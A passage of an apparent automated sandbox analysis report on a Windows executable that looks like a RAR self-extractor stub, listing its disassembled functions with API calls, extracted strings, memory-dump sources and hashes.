                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 007DD6ED
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DD709
                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007DD720
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 007DD734
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007DD75D
                                                                      • DeleteObject.GDI32(00000000), ref: 007DD764
                                                                      • GetWindow.USER32(00000000,00000002), ref: 007DD76D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                      • String ID: STATIC
                                                                      • API String ID: 3820355801-1882779555
                                                                      • Opcode ID: abc800cee40c76d72224fa9bd6611f1e87617fa10786fb2b04985ddfe0d107c0
                                                                      • Instruction ID: fffbda576d14ed863d23066adc33ebeec1cf9617ab849a02af2af57d2d787e79
                                                                      • Opcode Fuzzy Hash: abc800cee40c76d72224fa9bd6611f1e87617fa10786fb2b04985ddfe0d107c0
                                                                      • Instruction Fuzzy Hash: 3511D372640710BBE6316BB0AC4EFAF767CBF54761F008122FA51A62D1DA6CCF0646B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E9705
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007E9711
                                                                      • _free.LIBCMT ref: 007E971C
                                                                      • _free.LIBCMT ref: 007E9727
                                                                      • _free.LIBCMT ref: 007E9732
                                                                      • _free.LIBCMT ref: 007E973D
                                                                      • _free.LIBCMT ref: 007E9748
                                                                      • _free.LIBCMT ref: 007E9753
                                                                      • _free.LIBCMT ref: 007E975E
                                                                      • _free.LIBCMT ref: 007E976C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: c796a439b6380473b02fd8c7cf95eaa3ece8b6ff647d27b845e6d8b4cce6d496
                                                                      • Instruction ID: 4a898dc22e978748f2fa819bd03519973c2f0a680fb65180dbe98fab42a10cf8
                                                                      • Opcode Fuzzy Hash: c796a439b6380473b02fd8c7cf95eaa3ece8b6ff647d27b845e6d8b4cce6d496
                                                                      • Instruction Fuzzy Hash: DC11D476201049EFCB41EF56CC46CD93BB5EF1C350B0550A0FA088F2A2DE36DA509B85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 322700389-393685449
                                                                      • Opcode ID: a7bd8c80d15f9b4a54aaaa9226b6e19d3d77bae2cff781a568d445a0f767b87d
                                                                      • Instruction ID: ece8c1f672c253c86d99b8d7cd5b2fce8d9fe60f8f3b01e01351e8f94c2496b3
                                                                      • Opcode Fuzzy Hash: a7bd8c80d15f9b4a54aaaa9226b6e19d3d77bae2cff781a568d445a0f767b87d
                                                                      • Instruction Fuzzy Hash: DFB17F71802289EFCF25DFA6C8499AEB7B9FF0C310F14415AF8056B212D739DA52CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C6FAA
                                                                      • _wcslen.LIBCMT ref: 007C7013
                                                                      • _wcslen.LIBCMT ref: 007C7084
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                      • API String ID: 3122303884-3508440684
                                                                      • Opcode ID: f43b68f7a50421d616161a0862d7fd7b563e69b167dff14388e76130cf1834c7
                                                                      • Instruction ID: cc7688191ed01dde2c3414e9f7fb21dcdbc27561df6c024a529bae1c231e7b35
                                                                      • Opcode Fuzzy Hash: f43b68f7a50421d616161a0862d7fd7b563e69b167dff14388e76130cf1834c7
                                                                      • Instruction Fuzzy Hash: 40412BB1D04788BAEB24E7709C8AFEE776C9F44344F00445DFA55A7182DA7CA644CB31
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007D9736
                                                                      • _wcslen.LIBCMT ref: 007D97D6
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 007D97E5
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007D9806
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                      • API String ID: 1116704506-4209811716
                                                                      • Opcode ID: 724d99f709f9bb9fff357c8bf7aaa51fd5ce3608aa96777755199ee4a48c522b
                                                                      • Instruction ID: fa2a93842ed73bda42c8ed8fe3074c46788a61d40ff1c05abf037f9adf2418f8
                                                                      • Opcode Fuzzy Hash: 724d99f709f9bb9fff357c8bf7aaa51fd5ce3608aa96777755199ee4a48c522b
                                                                      • Instruction Fuzzy Hash: FB312832109355BBE725AF359C0AF6B77A8AF46720F14011FF601972D2EB6C9A05C3A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DB610
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 007DB637
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007DB650
                                                                      • SetWindowTextW.USER32(?,?), ref: 007DB661
                                                                      • GetDlgItem.USER32(?,00000065), ref: 007DB66A
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007DB67E
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007DB694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                      • String ID: LICENSEDLG
                                                                      • API String ID: 3214253823-2177901306
                                                                      • Opcode ID: b3f27349b833304b1ef914002bba1ce0e109fe17425baa1e4b6a1cc4f235380d
                                                                      • Instruction ID: 90ffaf18ff0841c6f971f0196df6047727479317b1d0f1bf0700f5ddd4c5bc43
                                                                      • Opcode Fuzzy Hash: b3f27349b833304b1ef914002bba1ce0e109fe17425baa1e4b6a1cc4f235380d
                                                                      • Instruction Fuzzy Hash: AE21E532204214FBD2219F76EC4DF7B3B7DFB4AB81F068019F600A22E1CB5AD9029675
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,10BC34D2,00000001,00000000,00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFD99
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE14
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 007DFE1F
                                                                      • _com_issue_error.COMSUPP ref: 007DFE48
                                                                      • _com_issue_error.COMSUPP ref: 007DFE52
                                                                      • GetLastError.KERNEL32(80070057,10BC34D2,00000001,00000000,00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE57
                                                                      • _com_issue_error.COMSUPP ref: 007DFE6A
                                                                      • GetLastError.KERNEL32(00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE80
                                                                      • _com_issue_error.COMSUPP ref: 007DFE93
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                      • String ID:
                                                                      • API String ID: 1353541977-0
                                                                      • Opcode ID: 950029e61e8477329f7d9ae55607f77ad8204572237717ab8f9ccaa28ab2969a
                                                                      • Instruction ID: 2c84a0610280253af36f0fb59404cebd11ef1856ad3d29dbcaa3899b5dac6323
                                                                      • Opcode Fuzzy Hash: 950029e61e8477329f7d9ae55607f77ad8204572237717ab8f9ccaa28ab2969a
                                                                      • Instruction Fuzzy Hash: 7241C4B1A00219EBDB109F65CC49BAEBBB9EB48710F14823BF916E7351D7389900C7A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                      • API String ID: 3519838083-3505469590
                                                                      • Opcode ID: dd5aa79f0611c1c8dd715a6c8f2e236082938f7d8380a0cc208f1152d9dbe0cf
                                                                      • Instruction ID: fbcd694aafa97f302162e3dbc41081a3f389dfa25040655de2057528311a04c5
                                                                      • Opcode Fuzzy Hash: dd5aa79f0611c1c8dd715a6c8f2e236082938f7d8380a0cc208f1152d9dbe0cf
                                                                      • Instruction Fuzzy Hash: 3F713970A00619AFDB14DFA4C895EBEBBB9FF48715B14415DF512A72A0CB38AD41CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C9387
                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007C93AA
                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007C93C9
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • _swprintf.LIBCMT ref: 007C9465
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • MoveFileW.KERNEL32(?,?), ref: 007C94D4
                                                                      • MoveFileW.KERNEL32(?,?), ref: 007C9514
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                      • String ID: rtmp%d
                                                                      • API String ID: 3726343395-3303766350
                                                                      • Opcode ID: 41f4b85988000804161715a227134c52c311497d7c7aafb0ebd9542e22d0ff42
                                                                      • Instruction ID: 17577406a46ab33f9900400bac61b69e0c24d07e825148208fb4881cc8809446
                                                                      • Opcode Fuzzy Hash: 41f4b85988000804161715a227134c52c311497d7c7aafb0ebd9542e22d0ff42
                                                                      • Instruction Fuzzy Hash: 8E4154B1901258A5CF61AB60DD4DFEE737CAF45340F1048ADB749E3191EA3C8B999B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C1100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: U}$p}$z}
                                                                      • API String ID: 176396367-1289527505
                                                                      • Opcode ID: cd9d04f147f5887c93d5c7e77e0ad7828ce8fd2a3a1065b326e558a630ad7cf0
                                                                      • Instruction ID: ff16d88598df6ddb7a9bfbda2257b43cda1cd1f2c4437c6ea3b002f29b9f7ddc
                                                                      • Opcode Fuzzy Hash: cd9d04f147f5887c93d5c7e77e0ad7828ce8fd2a3a1065b326e558a630ad7cf0
                                                                      • Instruction Fuzzy Hash: A741B671A006699BCB219F688C19AEE7BB8FF05311F00402EF945F7241DB38AE458BE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000), ref: 007D9EEE
                                                                      • GetWindowRect.USER32(?,00000000), ref: 007D9F44
                                                                      • ShowWindow.USER32(?,00000005,00000000), ref: 007D9FDB
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 007D9FE3
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 007D9FF9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$RectText
                                                                      • String ID: }$RarHtmlClassName
                                                                      • API String ID: 3937224194-3189391707
                                                                      • Opcode ID: ae8a8bc9516cb247b5a012bde2af71e62b6a00a1fc90cbcdbabc5c9e11919eb8
                                                                      • Instruction ID: 1790bcc992834ed92b35b837f60d148fdf335f69883b8f24436d671cd5711969
                                                                      • Opcode Fuzzy Hash: ae8a8bc9516cb247b5a012bde2af71e62b6a00a1fc90cbcdbabc5c9e11919eb8
                                                                      • Instruction Fuzzy Hash: C941AF32104210EFCB215F64DC4CB6B7BB8FF48705F00856AF949AA256DB3CDA19CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __aulldiv.LIBCMT ref: 007D122E
                                                                        • Part of subcall function 007CB146: GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 007D1251
                                                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 007D1263
                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007D1274
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1284
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1294
                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 007D12CF
                                                                      • __aullrem.LIBCMT ref: 007D1379
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                      • String ID:
                                                                      • API String ID: 1247370737-0
                                                                      • Opcode ID: dd841cc7e782391764a3a2260247d04287dfd63be7361e7eaf817a3618c80b1b
                                                                      • Instruction ID: f9f7278ab9338173ea6d7e5729bde0b7f9a01e0e0d8644a3770a84e32a54a92d
                                                                      • Opcode Fuzzy Hash: dd841cc7e782391764a3a2260247d04287dfd63be7361e7eaf817a3618c80b1b
                                                                      • Instruction Fuzzy Hash: 9A4128B1508305AFC710DF65C88496BBBF9FF88314F54892EF596C6210E738E649CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007C2536
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                      • String ID: ;%u$x%u$xc%u
                                                                      • API String ID: 3053425827-2277559157
